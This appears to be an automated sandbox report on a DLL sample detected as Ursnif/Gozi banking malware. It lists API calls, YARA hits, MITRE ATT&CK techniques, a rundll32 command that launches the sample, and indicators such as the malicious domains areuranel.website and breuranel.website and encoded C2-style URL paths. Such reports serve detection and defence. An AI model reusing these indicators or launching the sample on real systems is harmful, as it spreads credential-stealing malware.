Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E30B316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E316CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E30B316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

                      HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: www.msn.com
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: areuranel.website
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 52.97.218.66 187
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: breuranel.website
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: outlook.office365.com
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: msn.com
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: outlook.com
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: www.outlook.com
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 40.97.153.146 187
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 13.82.28.61 187
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 52.97.137.210 187
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
Source: loaddll32.exe, 00000000.00000002.1185146883.0000000001AD0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.874775508.0000000003860000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1186416387.00000000038B0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.884091204.0000000002D70000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.892445877.00000000034A0000.00000002.00020000.sdmp | Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.1185146883.0000000001AD0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.874775508.0000000003860000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1186416387.00000000038B0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.884091204.0000000002D70000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.892445877.00000000034A0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.1185146883.0000000001AD0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.874775508.0000000003860000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1186416387.00000000038B0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.884091204.0000000002D70000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.892445877.00000000034A0000.00000002.00020000.sdmp | Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.1185146883.0000000001AD0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.874775508.0000000003860000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1186416387.00000000038B0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.884091204.0000000002D70000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.892445877.00000000034A0000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
Source: C:\Windows\System32\loaddll32.exe | Code function: GetLocaleInfoW,
Source: C:\Windows\System32\loaddll32.exe | Code function: GetLocaleInfoW,
Source: C:\Windows\System32\loaddll32.exe | Code function: EnumSystemLocalesW,
Source: C:\Windows\System32\loaddll32.exe | Code function: EnumSystemLocalesW,
Source: C:\Windows\System32\loaddll32.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Windows\System32\loaddll32.exe | Code function: EnumSystemLocalesW,
Source: C:\Windows\System32\loaddll32.exe | Code function: EnumSystemLocalesW,
Source: C:\Windows\System32\loaddll32.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\Windows\System32\loaddll32.exe | Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04CDA82B cpuid
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E2D1172 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E32FF15 _free,_free,_free,GetTimeZoneInformation,_free,
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E2D1825 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04CDA82B RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

                      Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match | File source: 00000000.00000003.916793229.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.916426520.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.974874720.000000000573B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.916847995.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.916379765.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1049081119.000000000383F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.916579363.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1187092392.00000000054C0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.930983342.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.930624015.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.960454814.0000000003A3B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1020193164.000000000563D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.917263832.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.930910657.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.931064048.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1185910848.00000000037C0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.930863354.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.916716758.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.916652805.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1006058312.000000000393D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1063376109.000000000553F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.931519942.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.931136929.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.916501324.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.930715901.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.930775995.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 7036, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 7052, type: MEMORYSTR
Source: Yara match | File source: 4.3.rundll32.exe.8aa31a.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.322a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.rundll32.exe.2eca31a.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.rundll32.exe.2eca31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.342a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.rundll32.exe.8aa31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.rundll32.exe.4d094a0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.342a31a.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.6e2d0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.rundll32.exe.4970000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.6e2d0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.4cd0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.rundll32.exe.4970000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.35594a0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.1370000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.52294a0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.loaddll32.exe.139a31a.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.rundll32.exe.4d094a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.loaddll32.exe.139a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.35594a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.rundll32.exe.4970000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.322a31a.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.52294a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000003.855981301.0000000002EC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.843034391.00000000008A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.888775678.0000000004D09000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.817641494.0000000003420000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.859623257.0000000001390000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.815784536.0000000003220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1186977706.0000000005229000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1185750269.0000000003559000.00000004.00000040.sdmp, type: MEMORY

                      Remote Access Functionality:

Yara detected Ursnif
Source: Yara match | File sources: the same memory dumps, process memory spaces and unpacked PE files listed under Stealing of Sensitive Information above.

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation 2 | Path Interception | Process Injection 112 | Virtualization/Sandbox Evasion 1 | Input Capture 1 | System Time Discovery 2 | Remote Services | Input Capture 1 | Exfiltration Over Other Network Medium | Encrypted Channel 11 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Native API 1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection 112 | LSASS Memory | Security Software Discovery 21 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information 1 | Security Account Manager | Virtualization/Sandbox Evasion 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 2 | NTDS | Process Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 14 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Rundll32 1 | LSA Secrets | Account Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Owner/User Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | Remote System Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery 23 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

Trailing digits after a technique name are the report's matched-signature counts for that technique.

                      Behavior Graph

Behavior Graph ID: 500413 | Sample: 616412739e268.dll | Start date: 12/10/2021 | Architecture: WINDOWS | Score: 96

Graph content recovered as text (the graph image itself is not reproduced here):

• Start node: contacts outlook.com; signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Multi AV Scanner detection for submitted file; Yara detected Ursnif. Starts loaddll32.exe.
• loaddll32.exe: contacts breuranel.website, areuranel.website and 11 other IPs or domains; signatures: Writes or reads registry keys via WMI; Writes registry values via WMI. Starts three rundll32.exe instances and cmd.exe.
• First rundll32.exe started by loaddll32.exe: signatures: System process connects to network (likely due to code injection or exploit); Writes registry values via WMI. Starts WerFault.exe.
• The two other rundll32.exe instances started by loaddll32.exe: each starts a WerFault.exe; one of those WerFault.exe instances contacts 192.168.2.1 (unknown, unknown).
• cmd.exe starts rundll32.exe, which connects to 40.97.153.146 port 443 (source ports 49809, 49860; MICROSOFT-CORP-MSN-AS-BLOCKUS, United States), 52.97.137.210 port 443 (source port 49811; MICROSOFT-CORP-MSN-AS-BLOCKUS, United States) and 11 other IPs or domains; signature: System process connects to network (likely due to code injection or exploit).


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
616412739e268.dll | 6% | Virustotal |
616412739e268.dll | 24% | ReversingLabs | Win32.Infostealer.Gozi

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
0.2.loaddll32.exe.1370000.0.unpack | 100% | Avira | HEUR/AGEN.1108168
5.0.rundll32.exe.4970000.0.unpack | 100% | Avira | HEUR/AGEN.1108168
5.2.rundll32.exe.4970000.0.unpack | 100% | Avira | HEUR/AGEN.1108168
5.0.rundll32.exe.4970000.1.unpack | 100% | Avira | HEUR/AGEN.1108168
3.2.rundll32.exe.4cd0000.0.unpack | 100% | Avira | HEUR/AGEN.1108168

Domains

Source | Detection | Scanner | Label
areuranel.website | 7% | Virustotal |
breuranel.website | 7% | Virustotal |

URLs

Source | Detection | Scanner | Label
https://deff.nelreports.net/api/report?cat=msn | 0% | URL Reputation | safe
https://mem.gfx.ms/meversion/?partner=msn&market=en-us" | 0% | Avira URL Cloud | safe
https://watson.tel | 0% | Virustotal |
https://watson.tel | 0% | Avira URL Cloud | safe

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
msn.com | 13.82.28.61 | true | false | | high
outlook.com | 40.97.116.82 | true | false | | high
HHN-efz.ms-acdc.office.com | 52.97.183.162 | true | false | | high
FRA-efz.ms-acdc.office.com | 52.98.207.194 | true | false | | high
www.msn.com | unknown | unknown | false | | high
www.outlook.com | unknown | unknown | false | | high
areuranel.website | unknown | unknown | true | | unknown
breuranel.website | unknown | unknown | true | | unknown
outlook.office365.com | unknown | unknown | false | | high

                                    Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
https://outlook.com/signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jre | false | | high
https://outlook.com/signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jre | false | | high
https://msn.com/mail/liopolo/NtZggqxIX2EF9w_2/BavTQ0jHk8z72E0/mrA_2BNo5fGf18qS53/GIhA4FNpc/qIQbJVkxLHpIx3LzJcYF/3uQz3PgIC5Pjndy7vBH/i_2FOaoK6pUzqTQ2mVu3pq/cfXt8VkJHx4pF/9i2ySYSz/e6Fwjd_2BYZ5QEKc2Ev8w_2/FX9nTU6mpV/BkgebLJcyW_2BOHak/X7QoD77ir05E/ic.jre | false | | high
https://outlook.office365.com/signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jre | false | | high
https://msn.com/mail/liopolo/5hHdOh6aVGIiN/xm3v7_2B/EkShunhzAo7MsZ9CmkqFWtX/3z_2Bns4ON/91CWMsZkh9K0L_2FK/DGWBtSEwajEJ/0TtpREbudd5/QgJK102N2T9j48/a7_2B8h2NmEQ_2FO6HINr/eS5x2dWmrnxEuUas/E6VYZyoESNredc4/JUFmKkMiSye_2BBKeH/JexZCfmhU/vSKjW_2B8KOY/RYzBQt1.jre | false | | high
https://www.outlook.com/signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jre | false | | high
https://www.outlook.com/signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jre | false | | high
https://outlook.office365.com/signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jre | false | | high

                                                    URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://msn.com/f | loaddll32.exe, 00000000.00000003.917168598.0000000001701000.00000004.00000001.sdmp | false | | high
https://www.msn.com/mail/liopolo/31Pla_2BCXtei/1R_2BY6O/xV8Y0PePoExsKvdRsArLjMT/0HY9ewGl4d/RTh7V4sy0 | loaddll32.exe, 00000000.00000003.917087190.00000000016FB000.00000004.00000001.sdmp | false | | high
https://wwtlook.office365.com/ | loaddll32.exe, 00000000.00000002.1183944098.000000000164B000.00000004.00000020.sdmp | false | | high
https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a | loaddll32.exe, 00000000.00000003.1093653246.0000000001716000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.1108208109.00000000058BC000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmp | false | | high
https://blogs.msn.com/ | loaddll32.exe, 00000000.00000003.916793229.0000000003BB8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.931542596.00000000058BC000.00000004.00000040.sdmp | false | | high
https://www.outlook.com/signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V | loaddll32.exe, 00000000.00000003.1181590460.00000000016A1000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.1184778471.0000000001722000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1181707542.0000000001715000.00000004.00000001.sdmp | false | | high
https://deff.nelreports.net/api/report?cat=msn | loaddll32.exe, 00000000.00000003.1005943661.000000000169F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1093682966.000000000170D000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.931542596.00000000058BC000.00000004.00000040.sdmp | false | URL Reputation: safe | unknown
https://www.msn.com/en-us//api/modules/fetch" | loaddll32.exe, 00000000.00000003.1093773062.0000000003BBB000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.1093653246.0000000001716000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.917087190.00000000016FB000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.1108259014.00000000058BB000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmp | false | | high
https://web.vortex.data.msn.com/collect/v1/t.gi | rundll32.exe, 00000003.00000003.930983342.00000000058B8000.00000004.00000040.sdmp | false | | high
http://ogp.me/ns/fb# | loaddll32.exe, 00000000.00000003.1093713289.0000000001713000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.1108259014.00000000058BB000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmp | false | | high
https://outlook.office365.com/2H | loaddll32.exe, 00000000.00000003.1005981116.00000000016C2000.00000004.00000001.sdmp | false | | high
https://msn.com/ | loaddll32.exe, 00000000.00000002.1183944098.000000000164B000.00000004.00000020.sdmp | false | | high
https://msn.com/D | loaddll32.exe, 00000000.00000002.1183944098.000000000164B000.00000004.00000020.sdmp | false | | high
https://www.msn.com/?refurl=%2fmail%2fliopolo%2f31Pla_2BCXtei%2f1R_2BY6O%2fxV8Y0PePoExsKvdRsArLjMT%2 | loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmp | false | | high
https://outlook.office365.com/signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/Bo | loaddll32.exe, 00000000.00000003.1005814049.000000000170B000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1005878880.0000000001706000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1005753123.000000000170C000.00000004.00000001.sdmp | false | | high
https://outlook.office365.com/ | loaddll32.exe, 00000000.00000003.1005981116.00000000016C2000.00000004.00000001.sdmp | false | | high
https://mem.gfx.ms/meversion/?partner=msn&market=en-us" | loaddll32.exe, 00000000.00000003.1093653246.0000000001716000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.1093739436.0000000003BBC000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.1108208109.00000000058BC000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | unknown
https://www.msn.com/?refurl=%2fmail%2fliopolo%2f5hHdOh6aVGIiN%2fxm3v7_2B%2fEkShunhzAo7MsZ9CmkqFWtX%2 | loaddll32.exe, 00000000.00000003.1093653246.0000000001716000.00000004.00000001.sdmp | false | | high
https://www.outlook.com/signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXa | loaddll32.exe, 00000000.00000003.1005943661.000000000169F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1005753123.000000000170C000.00000004.00000001.sdmp | false | | high
http://ogp.me/ns# | loaddll32.exe, 00000000.00000003.1093713289.0000000001713000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.1108259014.00000000058BB000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmp | false | | high
https://outlook.office365.com/signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNus | loaddll32.exe, 00000000.00000003.1181590460.00000000016A1000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1181707542.0000000001715000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.1183944098.000000000164B000.00000004.00000020.sdmp | false | | high
https://www.msn.com/?refurl=%2fmail%2fliopolo%2fNtZggqxIX2EF9w_2%2fBavTQ0jHk8z72E0%2fmrA_2BNo5fGf18q | rundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmp | false | | high
https://outlook.com/signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V/abY | loaddll32.exe, 00000000.00000003.1181590460.00000000016A1000.00000004.00000001.sdmp | false | | high
https://outlook.office365.com/9H | loaddll32.exe, 00000000.00000002.1184438243.00000000016C2000.00000004.00000001.sdmp | false | | high
https://watson.tel | WerFault.exe, 0000000C.00000002.928906655.00000000048CC000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000002.929018615.0000000004983000.00000004.00000001.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://www.msn.com/?refurl=%2fmail%2fliopolo%2fQoeEw7znNY9KuZLPv%2fPhlDvAFg0Bnn%2fnVx6DnTynJS%2fJqe | rundll32.exe, 00000003.00000003.1108208109.00000000058BC000.00000004.00000040.sdmp | false | | high

                                                                                                  Contacted IPs


                                                                                                  Public

IP | Domain | Country | ASN | ASN Name | Malicious
52.98.207.194 | FRA-efz.ms-acdc.office.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
52.97.218.66 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | true
52.97.218.82 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
40.101.124.226 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
40.97.153.146 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | true
13.82.28.61 | msn.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
52.97.137.210 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | true
40.97.116.82 | outlook.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
52.97.183.162 | HHN-efz.ms-acdc.office.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false

                                                                                                  Private

                                                                                                  IP
                                                                                                  192.168.2.1

                                                                                                  General Information

